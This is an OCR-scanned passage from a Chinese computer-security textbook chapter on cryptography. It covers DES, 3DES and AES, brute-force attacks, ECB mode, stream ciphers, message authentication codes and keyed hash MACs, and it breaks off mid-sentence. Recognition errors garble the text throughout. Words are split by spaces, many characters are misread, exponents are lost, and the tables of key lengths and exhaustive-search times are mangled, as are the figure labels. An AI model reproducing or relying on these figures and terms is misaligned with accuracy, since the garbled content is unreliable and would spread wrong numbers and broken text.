解释 非 对 称 分 组 加 密 算法 的 基本 操作 ; 

概述 数字 签名 的 机 制 ， 并 阐明 数字 信封 的 概念 ; 
解释 随机 数 与 伪 随 机 数 在 密码 学 中 的 重要 意义 。 





密码 算法 是 计算 机 安全 服务 与 应 用 领域 中 一 个 重要 的 组 成 部 分 。 本 章 概 述 了 各 种 类 型 的 密 
码 算 法 ， 并 讨论 了 它们 的 适用 性 。 对 于 每 种 类 型 的 算法 ,介绍 了 在 第 见 应 用 中 最 重要 的 标准 化 
算法 。 关 于 各 种 算法 的 技术 细节 ， 将 在 本 书 第 四 部 分 进行 详细 的 讨论 。 

首先 介绍 对 称 加 密 ， 对 称 加 密 具 有 广泛 的 应 用 背景 ， 主 要 用 来 提供 机 密 性 服务 。 之 后 ， 检 
验 散 列 函数 的 安全 性 ， 并 讨论 它们 在 消息 认证 领域 中 的 应 用 。 接 下 来 介绍 公 钥 加 密 (也 称 为 
“ 非 对 称 加密 ”)。 田 外， 还 将 介绍 公 钥 加 密 的 两 种 最 重要 的 应 用 ， 即 数字 签名 和 密 钥 管 理 。 在 
数字 签名 应 用 中 ， 将 非 对 称 加 密 和 安全 散 列 函数 相 结 合 ， 得 到 一 个 极为 有 用 的 工具 。 

最 后 ， 通 过 介绍 存储 数据 的 加 密 给 出 了 一 个 密码 算法 在 实际 中 应 用 的 例子 。 


2.1 用 对 称 加 密实 现 机 密 性 


对 称 加 密 是 为 传输 和 存储 数据 提供 机 密 性 所 广泛 使 用 的 一 种 技术 。 本 节 首 先 介绍 对 称 加 
密 的 基本 概念 ， 接 着 讨论 两 个 最 重要 的 对 称 分 组 加 密 算 法 : 数据 加 密 标 准 (Data Encryption 
Standard, DES) 和 高 级 加 密 标准 (Advanced Encryption Standard，AES )。 最 后 介绍 对 称 流 密码 
算法 的 概念 。 


2.1.1 ”对称 加 密 


对 称 加 密 也 称 “传统 加 密 ” 或 “ 单 密 钥 加 密 ”， 是 20 世纪 70 年 代 后 期 公 钥 密码 产生 之 前 
唯一 的 一 种 加 密 技 术 。 无 数 的 个 人 和 团体 ， 从 尤 利 乌 斯 :已 撤 ( Julius Caesar) 到 德国 的 潜水 艇 
部 队 (German U-boat force)， 再 到 当今 的 外 交 、 军 事 和 商业 ， 均 使 用 对 称 加 密 来 进行 秘密 通信 。 
对 称 加 密 现 在 仍然 是 两 种 加 密 算 法 中 使 用 最 广泛 的 一 种 。 

对 称 加 密 方案 有 五 个 基本 成 分 ( 见 图 2-1 ): 

e 明文 (plaintext): 作为 算法 的 输入 ， 是 原始 的 消息 和 数据 。 

e 加 密 算法 (encryption algorithm): 加 密 算法 对 明文 进行 各 种 代 换 和 变换 。 

e 秘密 密 钥 (secret key): 秘密 密 钥 也 是 加 密 算法 的 输入 。 算 法 所 用 的 特定 的 代 换 和 变换 

依赖 于 密 钥 。 

e ZX (ciphertext): 作为 算法 的 输出 ， 看 起 来 是 完全 随机 而 杂乱 的 数据 ， 其 依赖 于 明文 
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和 秘密 密 钥 。 对 于 给 定 的 消息 ， 两 个 不 同 的 密 钥 将 产生 两 个 不 同 的 密 文 。 
e 解密 算法 (decryption algorithm): 解密 算法 本 质 上 是 加 密 算 法 的 逆 运 算 ， 输入 密 文 和 秘 


密 密 钥 可 以 恢复 明文 。 
收发 双方 共享 收发 双方 共享 
的 秘密 密 钥 的 秘密 密 钥 





加 密 算法 解密 算法 (加密 
(如 DES ) 算法 的 逆 运 算 ) ie 


图 2-1 对 称 加 密 的 简化 模型 


对 称 加 密 的 安全 使 用 需要 满足 如 下 两 个 要 求 : 

1. 加 密 算法 必须 是 足够 强 的 。 至 少 ， 这 个 算法 在 敌手 知道 它 并 且 能 够 得 到 一 个 或 者 多 个 密 
文 时 也 不 能 破译 密 文 或 计算 出 密 钥 。 这 个 要 求 通常 用 一 种 更 强 的 形式 表述 为 : 即使 敌手 拥有 一 
定数 量 的 密 文 和 用 于 产生 这 些 密 文 的 明文 ， 他 也 不 能 破译 密 文 或 发 现 密 钥 。 

2. 发 送 者 和 接收 者 必须 在 某 种 安全 的 形式 下 获得 秘密 密 钥 的 副本 并 且 必 须 保证 密 钥 的 安全 。 
如 果 有 人 发 现 该 密 钥 ， 并 且 知 道 相应 的 算法 ， 那 么 就 能 读 出 使 用 该 密 钥 加 密 的 所 有 通信 和 内容 。 

攻击 对 称 加 密 方案 有 两 种 一 般 的 方法 。 第 一 种 攻击 方法 是 密码 分 析 〈 cryptanalysis)。 密 
码 分 析 攻 击 依赖 于 算法 的 性 质 以 及 可 能 得 到 的 明文 的 一 般 特征 甚至 某 些 明 文 - 密 文 对 的 样 
本 。 这 种 形式 的 攻击 企图 利用 算法 的 特征 来 推导 出 特定 的 明文 或 使 用 的 密 钥 。 如 果 这 种 攻击 ”32] 
成 功 地 推导 出 密 钥 ， 那 么 影响 将 是 灾难 性 的 : 将 会 危及 所 有 未 来 和 过 去 使 用 该 密 钥 加 密 的 信息 
的 安全 。 

第 二 种 方法 是 蛮 力 攻击 ( brute-force attack) (也 可 称 为 穷 举 攻击 )。 蛮 力 攻击 者 对 一 条 密 文 
尝试 所 有 可 能 的 密 钥 ， 直 至 把 它 转化 为 可 读 的 有 意义 的 明文 。 平 均 而 言 ， 获 得 成 功 至 少 要 尝试 
所 有 可 能 密 钥 的 一 半 。 也 就 是 说 ， 如 果 存 在 x 种 不 同 的 密 钥 ， 攻 击 者 只 有 做 出 x/2 次 尝试 后 才 
可 能 获得 真正 的 密 钥 。 值 得 说 明 的 是 ， 亦 力 攻击 并 非 指 的 是 尝试 所 有 可 能 的 密 钥 。 除 非 是 在 明 
文 已 知 的 情况 下 ， 密 码 分 析 者 会 尝试 所 有 密 钥 ， 以 确认 所 给 的 明文 是 否 是 真正 的 明文 。 如 果 
消息 仅仅 是 英文 的 明文 ， 那 么 结果 很 容易 得 到 一 一 尽管 英文 识别 工作 需要 自动 完成 。 如 果 文 
本 消息 在 加 密 前 进行 了 压缩 ， 那 识别 就 很 困难 了 。 如 果 信 息 是 更 一 般 的 数据 类 型 ， 如 数字 文 
件 ， 并 进行 了 压缩 ， 那 么 识别 就 更 难于 自动 实现 了 。 因 此 ， 作 为 对 蛮 力 攻击 的 补充 ， 还 需要 
知道 相关 明文 的 某 种 程度 的 知识 ， 并 且 需 要 有 将 正确 的 明文 从 杂乱 的 明文 堆 里 自动 识别 出 来 
的 方法 。 


2.1.2 ”对 称 分 组 加 密 算法 


使 用 最 广泛 的 对 称 加 密 算 法 是 分 组 密码 。 分 组 密码 是 将 定 长 的 明文 转换 成 与 明文 等 长 的 
窗 文 。 该 算法 将 较 长 的 明文 划分 为 一 系列 定 长 的 块 。 包 括 数 据 加 密 标准 (DES)、 三 重 DES 
(3DES) 和 高 级 加 密 标准 (AES)( 见 表 2-1 ) 等 在 内 的 重要 对 称 算 法 都 是 分 组 密码 。 本 小 节 对 这 
些 算 法 进行 综述 ， 第 20 章 将 给 出 相关 的 详细 技术 细节 。 

数据 加 密 标准 ”使 用 最 广泛 的 加 密 体 制 是 数据 加 密 标 准 ， 它 于 1977 年 被 美国 国家 标准 局 
( National Bureau of Standards) 即 现在 的 国家 标准 和 技术 人 研究 所 (National Institute of Standards 
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and Technology, NIST) 采纳 为 联邦 信息 处 理 标准 FIPS PUB 46 9。 这 个 算法 本 身 被 称 为 数据 加 
密 算法 (Data Encryption Algorithm, DEA). DES 采用 64 位 长 度 的 明文 分 组 和 56 位 长 度 的 密 钥 ， 
产生 64 位 长 度 的 密 文 分 组 。 


表 2-1 三 种 流行 对 称 加 密 算法 的 比较 


BAKE (fir) © w ee 128, 192 或 256 


7%: DES 三 数据 加 密 标 准 ; 3DES == FE DES; AES 三 高 级 加 密 标准 。 


可 从 两 个 方面 关注 DES 的 强度 : 一 是 关注 算法 本 身 ， 二 是 关注 56 位 密 钥 的 使 用 。 前 者 关 
注 密码 分 析 者 利用 DES 算法 本 身 的 特征 进行 密码 分 析 的 可 能 性 。 多 年 来 ， 人 们 已 进行 无 数 次 
尝试 ， 试 图 发 现 并 利用 算法 中 存在 的 弱点 ，DES 也 因此 成 为 现在 研究 得 最 深入 的 加 密 标 准 。 尽 
管 如 此 ， 至 今 还 没有 关于 DES 的 致命 弱点 的 报道 。 
受到 更 多 关注 的 是 密 钥 长 度 ，56 位 的 密 钥 共有 2” 种 可 能 ， 这 个 数字 大 约 是 7.2X10*。 遗 
憾 的 是 ， 考 虑 到 现在 的 商用 处 理 絮 速度， 这 个 密 钥 长 度 是 严重 不 足 的 。 希 捷 科 技 公司 (Seagate 
Technology) 的 一 篇 文章 指出 [SEAG08]， 在 现今 的 多 核 计算 机 上 上 ， 每 秒 尝 试 10 亿 (10) 种 密 
钥 组 合 已 成 为 可 能 。 而 近期 市 场 现 状 也 证 实 了 这 一 点 。Intel 和 AMD 公司 提出 用 基于 指令 的 硬 
件 加 速 AES 算法 的 运行 。 在 当前 Intel 多 核 处 理 器 上 进行 的 多 次 测试 表明 ， 速 度 大 约 为 每 秒 5 
亿 次 的 加 密 运 算 可 以 实现 [BASU12]。 而 另外 一 个 近期 分 析 指 出 ， 基 于 当前 的 超级 计算 机 技术 ， 
每 秒 执行 10” 次 加 密 运算 已 成 为 可 能 [AROR12]。 
鉴于 上 述 理论 结果 ， 表 2-2 给 出 了 对 于 不 同 的 密 钥 长 度 以 蛮 力 攻击 方法 破译 密码 所 需 的 时 
间 。 由 该 表 可 见 ， 一 台 PC 破解 一 个 密 钥 长 度 为 56 位 的 DES 密码 需要 10 小 时 ; 如 果 由 多 个 
PC 并 发 运行 ， 那 么 所 需 时 间 会 大 大 缩短 ; 而 当前 的 超级 计算 机 在 1 小 时 内 就 能 够 完成 这 个 运 
算 (找到 一 个 密 钥 )。128 位 或 更 多 位 密 钥 能 保证 算法 不 会 被 简单 的 蛮 力 攻击 破解 ， 即 使 设法 将 
破解 机 的 速度 提高 10” 倍 ， 仍 然 需要 100 000 年 的 时 间 来 破解 密码 。 


表 2-2 穷 举 密 钥 搜索 所 需 的 平均 时 间 


计算 所 需 时 间 计算 所 需 时 间 
2s sn 2'%~3.4 10" 2'7 us=5.3X 107! 年 5.3 10!7 年 
168 2'8=3.7X 10" 2'"us=5.8X 10” 年 5.8 X 107? 年 
256 2? 1.2% 10” 1.8 10% 4 


幸运 的 是 ， 还 有 一 些 算法 可 以 用 来 蔡 代 DES， 例 如 在 本 节 接 下 来 要 讨论 的 三 重 DES 和 AES. 
三 重 DES 算法 三 重 DES (3DES) 的 使 用 延长 了 DES 算法 的 寿命 ， 它 重复 基本 的 DES 
算法 三 次 ， 采 用 两 个 或 三 个 不 同 的 密 钥 ， 密 钥 长 度 为 112 位 或 168 位 。3DES 于 1985 年 在 


O AX NIST 和 类 似 组 织 的 更 多 信息 请 参见 附录 C， 我 们 所 讨论 的 相关 出 版 物 请 参见 “NIST 和 ISO 文件 列表 ”。 
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ANSI 标准 X 9.17 中 被 首次 标准 化 ， 多 应 用 在 金融 领域 。1999 年 随 着 FIPS PUB 46-3 的 发 布 ， 
3DES 被 合并 为 数据 加 密 标准 (Data Encryption Standard) 的 一 部 分 。 

3DES 的 两 个 优点 确保 了 它 在 未 来 几 年 里 的 广泛 应 用 。 首 先 ， 它 的 密 钥 长 度 是 168 位 ， 故 
能 克服 DES 所 面临 的 蛮 力 攻击 问题 。 其 次 ，3DES 的 底层 加 密 算 法 与 DES 的 加 密 算法 相同 ， 
分 析 破 解 该 算法 所 需要 的 时 间 比 任何 其 他 加 密 算 法 要 长 得 多 ， 且 也 未 能 发 现 有 比 亦 力 攻击 更 有 
效 的 、 基 于 算法 本 身 的 密码 分 析 攻 击 方法 。 相 应 地 ，3DES 对 密码 分 析 攻 击 有 很 强 的 免疫 力 。 
如 果 考 虑 算法 安全 ，3DES 将 成 为 未 来 十 年 加 密 算法 标准 的 合适 选择 。 

3DES 的 根本 缺点 在 于 用 软件 实现 算法 的 速度 比较 慢 。 起 初 ，DES 是 为 20 世纪 70 年 代 中 
期 的 硬件 实现 设计 的 ， 因 而 难于 用 软件 有 效 实 现 该 算法 。3DES 要 求 3 倍 于 DES 的 计算 量 ， 故 
其 速度 要 慢 得 多 。 男 一 个 缺点 是 ，DES 和 3DES 的 分 组 长 度 均 为 64 位 ， 就 效率 和 安全 性 而 言 ， 
其 分 组 长 度 应 更 长 。 

高 级 加 密 标准 ”由 于 自身 存在 缺陷 ，3DES 不 能 成 为 理想 的 长 期 使 用 的 加 密 算法 标准 。 作 
ASE Kin, NIST 在 1997 年 公开 征集 新 的 高 级 加 密 标 准 (AES)， 要 求 其 安全 强度 不 低 于 3DES 
并 能 显著 提高 计算 效率 。 除 了 这 些 通 常 的 要 求 之 外 ，NIST 特别 规定 了 高 级 加 密 标 准 必须 是 分 
组 长 度 为 128 位 的 对 称 分 组 密码 ， 并 能 支持 长 度 为 128 位 、192 位 和 256 位 的 密 钥 。 算 法 评估 
准则 包括 安全 性 、 计 算 效 率 、 存 储 空间 要 求 、 人 硬件 和 软件 平台 的 适应 性 ， 以 及 灵活 性 等 。 

15 个 候选 算法 通过 了 第 一 轮 评估 。 而 仅 有 5 个 候选 算法 通过 了 第 二 轮 评估 。NIST 在 2001 
年 11 月 完成 了 评估 并 发 布 了 最 终 标准 (FIPS PUB 197). NIST 选择 Rijndael 作为 建议 的 AES 
算法 。AES 现在 已 经 广泛 应 用 于 商业 产品 。 有 关 AES 的 内 容 将 在 第 20 章 进 行 详细 的 介绍 。 

实际 的 安全 问题 一 般 来 说 ， 对 称 加 密 应 用 于 长 于 64 位 或 128 位 分 组 的 数据 单元 。 电 子 
邮件 消息 、 网 络 包 、 数 据 库 记录 和 其 他 明文 消息 源 用 对 称 分 组 密码 加 密 时 ， 必 须 将 它们 分 成 
固定 长 度 的 分 组 序列 。 最 简单 的 多 分 组 加 密 方式 被 称 为 电子 密码 本 (CECB) 模式 。 在 该 模 
式 中 ， 明 文 每 次 被 提交 b 位 并 且 每 组 明文 用 相同 的 密 钥 进行 加 密 。 通 常 , bp 二 64 或 5 二 128。 图 
2-2a 显示 了 ECB 模式 的 工作 过 程 。 长 度 为 nb 的 明文 被 分 成 nn 个 b 位 的 分 组 (Pi, Po, …, Pr), 
每 个 分 组 用 相同 的 算法 和 相同 的 密 钥 加 密 ， 产 生出 由 nn 个 b 位 分 组 组 成 的 密 文 序列 (C, 
Cat", Cato 

对 于 很 长 的 消息 ，ECB 模式 可 能 不 安全 。 密 码 分 析 者 可 能 利用 明文 中 的 一 些 规律 来 破译 。 
例如 ， 若 这 段 消 息 总 是 以 某 些 固定 的 字符 开头 ， 密 码 分 析 者 就 可 以 拥有 大 量 的 明文 - 密 文 对 ， 
进而 展开 攻击 。 

为 了 增强 用 于 加 密 大 数据 序列 的 对 称 分 组 密码 的 安全 性 ， 出 现 了 大 量 可 选择 的 其 他 技术 ， 
称 为 操作 模式 (mode of operation)。 这 些 模 式 克 服 了 ECB 的 缺点 ， 每 个 模式 具有 自己 独 有 的 优 
势 。 这 个 话题 将 在 第 20 章 中 进行 讨论 。 


2.1.3 流 密码 


分 组 密码 (block cipher) 一 次 处 理 输入 的 一 组 元 素 ， 每 个 输入 分 组 产生 一 个 输出 分 组 。 流 密码 
(stream cipher) 则 持续 地 处 理 输入 元 素 ， 每 次 产生 一 个 元 素 的 输出 ， 持 续 进 行 下 去 。 尽 管 分 组 密 
码 已 非常 普遍 ， 但 是 某 些 基于 流 密码 的 应 用 也 是 很 受 欢 迎 的 。 本 书 的 后 面 给 出 了 相关 的 例子 。 

一 个 典型 的 流 密码 每 次 加 密 1 字 节 的 明文 ， 当 然 流 密码 也 可 被 设计 为 每 次 操作 1 位 或 者 
大 于 1 字 节 的 单元 。 图 2-2b 给 出 了 一 个 典型 的 流 密 码 结构 图 。 在 该 结构 中 ， 密 钥 输 入 到 一 个 
伪 随 机 位 发 生 器 中 ， 该 伪 随 机 位 发 生 器 产生 一 串 随 机 的 8 位 数 。 一 个 伪 随 机 流 就 是 在 不 知道 输 
人 密 钥 的 情况 下 不 可 预知 的 流 ， 其 明显 具有 随机 特性 〈 见 2.5 节 )。 发 生 需 的 输出 称 为 密 钥 流 
(keystream)， 每 次 组 合成 1 字 节 ， 并 与 明文 流 进 行 逐 位 异 或 (XOR) 运算 。 
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伪 随 机 字 节 发 生 器 | T omnet a) 
“| 〈 密 钥 流 发 生 器 ) | | CEARR) | 


明文 字 节 流 
M 





b) 流 密码 加 密 
图 2-2 对称 加 密 的 类 型 


通过 设计 合适 的 伪 随 机 数 发 生 器 ， 流 密码 可 以 提供 和 相应 密 钥 长 度 的 分 组 密码 相当 的 安全 
性 。 流 密码 相对 于 分 组 密码 的 主要 优点 是 ,往往 速 度 更 快 而 且 编 写 的 代码 更 少 。 分 组 密码 的 优 
点 是 可 以 重复 使 用 密 钥 。 对 于 需要 对 数据 流 进行 加 密 /解密 的 应 用 ， 比 如 在 一 个 数据 通信 信道 
上 或 者 浏览 器 /Web 连接 上 通信 ， 流 密码 就 是 很 好 的 解决 方案 。 而 对 于 处 理 成 块 数据 的 应 用 ， 
比如 文件 传输 、 电 子 邮 件 和 数据 库 ， 分 组 密码 则 更 为 适用 。 当 然 ， 在 实际 中 两 种 类 型 的 密码 都 
可 用 于 各 种 应 用 。 


2.2 消息 认证 和 散 列 函数 


加 密 可 以 防止 被 动 攻击 〈 穷 听 )。 加 密 的 另 一 个 要 求 是 防止 主动 攻击 〈 数 据 伪 造 和 纂 改 )。 
关于 防止 这 些 攻 击 的 办 法 ,著名 的 是 消息 认证 或 数据 认证 。 

当 消息 、 文 件 、 文 档 或 其 他 数据 集合 是 真实 的 且 来 自 合 法 信 源 ， 则 被 称 为 是 可 信 的 。 消 息 
或 数据 认证 是 一 种 允许 通信 者 验证 所 接收 或 存储 的 数据 是 否 可 信 的 措施 92。 认证 包括 两 个 重要 
方面 : 验证 消息 的 内 容 有 没有 被 自 改 和 验证 信 源 是 否 可 信 。 还 可 以 验证 消息 的 时 效 性 〈 即 消息 
没有 被 人 为 地 延迟 和 重 放 ) 以 及 两 个 实体 之 间 传 输 的 消息 流 的 相对 顺序 。 所 有 这 些 问题 正如 第 


O “为 简单 起 见 ， 在 本 节 剩 余部 分 ， 均 指 消息 认证 。 到 目前 为 止 ， 它 既 指 对 传输 的 消息 的 认证 ,也 指 对 存储 的 


数据 的 认证 (数据 认证 )。 


B2 FBRABIA 27 


1 草 所 介绍 的 都 被 归 人 数据 的 完整 性 。 
2.2.1 利用 对 称 加 密实 现 认 证 


仅仅 简单 地 使 用 对 称 加 密 也 可 以 进行 消息 认证 。 假 设 只 有 发 送 方 和 接收 方 共 享 一 个 密 钥 
(这 是 合理 的 )， 那 么 只 有 真正 的 发 送 方才 能 够 成 功 地 为 对 方 (其 他 参与 者 ) 加 密 消 息 ， 提 供 接 
收 者 能 识别 的 有 效 消息 。 此 外 ， 如 果 消 息 里 带 有 纠 错 码 和 序号 ， 则 接收 方 就 可 以 确认 消息 是 否 
被 修改 过 以 及 顺序 是 否 正 确 。 如 果 消 息 还 包括 时 间 戳 ， 那 么 接收 方 就 可 以 确认 消息 的 传输 有 没 
有 超出 网 络 传输 的 正常 延 到 。 

事实 上 ， 单 独 的 对 称 加 密 并 不 是 数据 认证 的 有 效 工 具 。 举 一 个 简单 的 例子 ,在 ECB 加 
密 模 式 下 ， 如 果 攻 击 者 重组 了 密 文 分 组 ， 那 么 每 个 分 组 仍然 能 成 功 地 被 解密 。 但 是 重组 可 能 
改变 了 整个 数据 序列 的 意义 。 尽 管 序 号 可 以 用 在 某 些 级 别 (如 每 个 IP 包 ), 但 通常 不 会 为 每 
A b 位 明文 分 组 关联 一 个 单独 的 序号 。 因 此 ， 分 组 重组 (block reordering) 成 了 一 个 潜在 的 
威胁 。 


2.2.2 无 须 加 密 的 消息 认证 


在 这 一 小 节 ， 我 们 研究 几 种 不 依赖 于 消息 加 密 的 消息 认证 技术 。 所 有 这 些 技术 都 会 生成 认 
证 标签 ， 并 且 附 加 在 每 一 条 消息 上 传输 。 消 息 本 身 并 不 会 被 加 密 ， 所 以 它 在 目的 地 是 可 读 的 ， 
而 且 与 目的 地 的 认证 功能 无 关 。 

由 于 这 里 讨论 的 技术 不 对 消息 加 密 ， 因 此 其 没有 提供 消息 的 机 密 性 。 如 上 所 述 ， 消 息 加 密 
本 身 没 有 提供 一 个 安全 的 认证 形式 。 但 是 通过 加 密 消 息 加 上 认证 标签 可 以 将 认证 和 机 密 性 组 合 
在 一 个 算法 中 。 人 然而， 通常 情况 下 ， 消 息 认证 已 经 作为 一 个 独立 的 功能 从 消息 加 密 中 分 离 出 来 
了 。[DAVI89] 中 给 出 了 三 种 采用 无 机 密 性 的 消息 认证 更 为 恰当 的 情形 。 

1. 有 许多 应 用 是 将 同一 消息 广播 到 很 多 目的 地 。 可 以 举 两 个 例子 ， 一 个 是 通知 各 用 户 网 络 
和 暂时 不 可 使 用 ， 另 一 个 是 控制 中 心 发 出 的 报警 信号 。 一 种 更 经 济 可 靠 的 方法 就 是 只 有 一 个 接收 
者 负责 验证 消息 的 真实 性 。 因 此 消息 必须 以 明文 加 上 消息 认证 标签 的 形式 进行 广播 。 负 责 验证 
的 系统 进行 认证 ， 如 果 发 生 错 误 ， 它 就 发 出 警报 通知 其 他 接收 者 。 

2. 在 信息 交换 中 ， 可 能 有 这 样 一 种 情况 ， 即 通信 某 一 方 处 理 负荷 较 大 ， 不 能 承担 解密 收 到 
的 所 有 消息 的 时 间 开 销 。 认 证 机 制 采用 选择 机 制 随机 地 选择 消息 进行 验证 。 

3. 对 明文 形式 的 计算 机 程序 进行 认证 是 一 种 很 吸引 人 的 服务 。 运 行 一 个 计算 机 程序 而 不 必 
每 次 对 其 解密 ， 因 为 每 次 对 其 解密 会 浪费 处 理 顺 资源 。 但 是 ， 将 消息 认证 标签 附 于 该 程序 后 ， 
则 可 在 需要 保证 程序 完整 性 的 时 候 才 对 其 进行 检验 。 

因此 ， 在 满足 安全 要 求 方 面 ， 认 证 和 加 密 都 有 其 适用 的 、 满 足 安 全 要 求 的 场合 。 

消息 认证 码 一 种 认证 技术 是 利用 秘密 密 钥 来 生成 一 个 固定 长 度 的 短 数据 块 ， 称 之 为 消息 
认证 码 ( MAC)， 并 将 该 数据 块 附加 在 消息 之 后 。 这 项 技术 假设 通信 双方 ， 比 如 A AB, 使 用 
共同 的 秘密 密 钥 Kae, TEA 向 B 发 送 消 息 时 ， 则 A 计算 消息 认证 码 ， 它 是 一 个 关于 消息 和 密 
钥 的 复杂 函数 : MACm 二 F(Kxs, M) 9。 消息 和 认证 码 一 起 被 发 送 给 接收 方 。 接 收 方 对 收 到 的 消 
息 用 相同 的 秘密 密 钥 进行 相同 的 计算 得 出 新 的 消息 认证 码 ， 并 将 收 到 的 认证 码 和 计算 出 的 认证 
码 进行 比较 ( 见 图 2-3 )。 我 们 假定 只 有 收发 双方 知道 该 秘密 密 钥 ， 那 么 如 果 接 收 到 的 认证 码 和 
计算 出 的 认证 码 相等 ， 则 有 


O ”因为 消息 可 能 是 任意 长 度 的 ， 而 消息 认证 码 的 长 度 很 短 且 固定 ， 所 以 理论 上 大 量 的 消息 中 一 定 会 产生 相同 
的 MAC。 但 是 ， 实 际 中 很 难 找到 具有 相同 MAC 的 消息 对 。 我 们 称 此 为 抗 碰撞 性 。 
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图 2-3 利用 消息 认证 码 进行 消息 认证 


1. 接收 方 可 以 相信 消息 未 被 修改 。 如 果 攻 击 者 改变 了 消息 ， 但 他 却 无 法 改变 相应 的 认证 
码 ， 所 以 接收 方 计 算出 的 认证 码 将 不 等 于 接收 到 的 认证 码 。 因 为 攻击 者 不 知道 秘密 密 钥 ， 所 以 
攻击 者 不 知道 应 该 如 何 改变 认证 码 才 能 使 其 与 修改 后 的 消息 一 致 。 

2. 接收 方 可 以 相信 消息 来 自 真 正 的 发 送 方 。 因 为 其 他 各 方 均 不 知道 秘密 密 钥 ， 因 此 他 们 不 
能 产生 具有 正确 认证 码 的 消息 。 

3. 如 果 消 息 中 含有 序号 (如 X.25、HDLC 和 TCP 中 使 用 的 序号 )， 那 么 接收 方 可 以 相信 消 
息 顺 序 是 正确 的 ， 因 为 攻击 者 无 法 成 功 地 修改 序号 。 

很 多 算法 都 可 以 用 来 生成 认证 码 。 现 在 取消 使 用 的 NIST 标准 FIPS PUB 113 (计算 机 数据 
认证 ，1985 年 5 月 ) 推荐 使 用 DES。 然 而 现在 AES 是 更 加 合适 的 选择 。DES Al AES 被 用 来 
产生 消息 的 加 密 密 文 ， 并 将 密 文 的 最 后 几 位 作为 认证 码 。 一 般 使 用 16 位 或 32 位 ,但 是 目前 看 
来 位 数 还 是 不 够 长 ， 不 足以 抵抗 碰撞 5 。 

这 个 认证 过 程 很 像 加 密 过 程 ， 它 们 之 间 的 一 点 不 同 是 : 认证 算法 不 需要 是 可 逆 的 ， 而 解密 
必须 是 可 道 的 。 已 经 证 实 由 于 认证 函数 的 数学 特性 ， 它 相对 于 加 密 来 说 更 不 易 被 破解 。 

单 向 散 列 函数 ” 单 向 散 列 函数 是 消息 认证 码 的 一 种 变形 。 与 消息 认证 码 一 样 ， 散 列 函 数 接 
受 可 变 长 度 的 消息 M 作为 输入 ， 产 生 固 定 长 度 的 消息 摘要 AM 作为 输出 〈 见 图 2-4 )。 一 般 来 
说 ， 消 息 的 长 度 被 填充 到 某 个 固定 长 度 (如 1024 位 ) 的 整数 倍 ， 填 充 的 消息 包括 原始 消息 以 
位 为 单位 的 长 度 值 。 这 个 长 度 字 段 作 为 一 个 安全 措施 增加 了 攻击 者 利用 散 列 值 改 变 消息 (产生 
具有 相同 散 列 函数 值 的 另 一 个 消息 ) 的 难度 。 

与 MAC 不 同 的 是 ， 散 列 函 数 不 能 使 用 秘密 密 钥 作 为 输入 ， 为 了 对 一 个 消息 进行 认证 ， 
可 信 的 消息 摘要 和 消息 一 起 被 发 送出 去 。 图 2-5 给 出 了 利用 散 列 值 对 消息 进行 认证 的 三 种 
方式 。 消 息 摘 要 ( 散 列 码 ) 可 以 利用 对 称 加 密 (图 2-5a)。 假 定 只 有 发 送 方 和 接收 方 共 享 加 
密 密 钥 ， 那 么 可 信和 性 就 可 以 得 到 保证 。 消 息 摘要 也 可 以 利用 公 钥 加 密 (图 2-5b)。 这 将 在 
2.3 节 讨 论 。 利 用 公 钥 密码 加 密 有 两 个 优点 : 其 提供 了 数字 签名 和 消息 认证 ; 不 要 求 密 钥 分 
发 到 通信 各 方 。 

日 ”回想 我 们 在 2.1 节 讨论 的 关于 大 量 数据 的 实际 安全 问题 ， 一 些 操作 模式 需要 将 诸如 DES 之 类 的 分 组 密码 运 

用 到 长 度 大 于 一 个 分 组 的 数据 。 对 于 在 这 里 提 到 的 MAC 应 用 ，DES 采用 密码 分 组 链接 模式 (CBC)。 大 体 


E, DES 按 顺 序 应 用 于 每 个 64 位 的 消息 分 组 ， 加 密 算法 的 输入 是 当前 的 明文 分 组 和 以 前 的 密 文 分 组 的 异 或 
值 。MAC 来 源 于 最 终 的 分 组 加 密 。 见 第 20 章 关 于 CBC 的 讨论 。 
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工 位 


-一 2 
消息 或 数据 分 组 M (TERE) 







散 列 值 i p 
( 固定 长 度 ) 


P, L= 填 充 + 长 度 字 段 
图 2-4 ”密码 散 列 函数 ; h=H(M) 





a) 利用 对 称 加 密 





b) 利用 公 钥 加 密 





c) 利用 秘密 值 
图 2-5 利用 单 向 散 列 函数 进行 消息 认证 
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在 通信 量 较 小 的 情况 下 ， 这 两 种 方法 与 加 密 整 条 消息 相 比 更 具 优势 。 然 而 ， 人 们 越 来 越 对 
开发 完全 不 含 加密 函 数 的 方法 感 兴 趣 。[TSUD92] 中 给 出 了 几 种 不 希望 使 用 加 密 函 数 的 理由 |; 
e 加 密 软 件 速度 慢 。 即 使 每 条 消息 需要 加 密 的 数据 量 不 大 ， 但 也 总 有 消息 流 会 输入 到 系 
统 中 或 由 系统 输出 。 

e 加 密 硬件 成 本 不 容 忽 视 。 尽 管 已 有 实现 DES (或 AES) 的 低 成 本 芯片 ， 但 是 如 果 网 络 
中 所 有 节点 都 必须 有 该 硬件 ， 则 总 成 本 可 能 很 大 。 

e 加 密 硬 件 是 针对 大 数据 量 进 行 优 化 的 。 对 于 小 的 数据 分 组 ， 花 费 在 初始 化 和 调用 上 的 
时 间 所 占 的 比例 很 大 。 

e 加 密 算 法 可 能 受到 专利 保护 。 

图 2-50 描述 了 利用 散 列 函数 但 不 使 用 加 密 的 消息 认证 技术 。 这 项 技术 被 称 为 密 钥 散 列 
MAC。 假 设 有 两 个 通信 实体 , 如 A 和 B， 使 用 共同 的 秘密 密 钥 开 。 这 个 秘密 密 钥 在 生成 散 列 
值 的 过 程 中 加 入 进来 。 图 2-50 描述 了 这 种 方法 ， 当 A 有 消息 要 发 送 给 B 时 ， 它 首先 计算 以 秘 
密 密 钥 与 消息 的 连接 为 自 变 量 的 散 列 函 数 : MDy=H(KI|MIK) SS。 然后 将 [MIIMDw] 发 送 给 B. 
因为 B 拥有 密 钥 入， 它 可 以 重新 计算 出 HCKIIMIIK) 并 检验 MDw 的 值 。 因 为 秘密 密 钥 本 身 并 不 
被 发 送 ， 所 以 攻击 者 不 能 簧 改 截获 的 信息 。 只 要 秘密 密 钥 是 安全 的 ， 那 么 攻击 者 就 不 可 能 生成 
伪 消 息 。 

需要 注意 的 是 ， 秘 密 密 钥 同时 作为 消息 的 前 级 和 后 级 。 如 果 秘 密 密 钥 仅 作为 前 级 或 仅 作为 
后 级 ， 那 么 这 种 机 制 的 安全 性 就 大 大 降低 了 。 这 个 话题 将 在 第 21 章 进 行 讨论 。 第 21 章 还 描述 
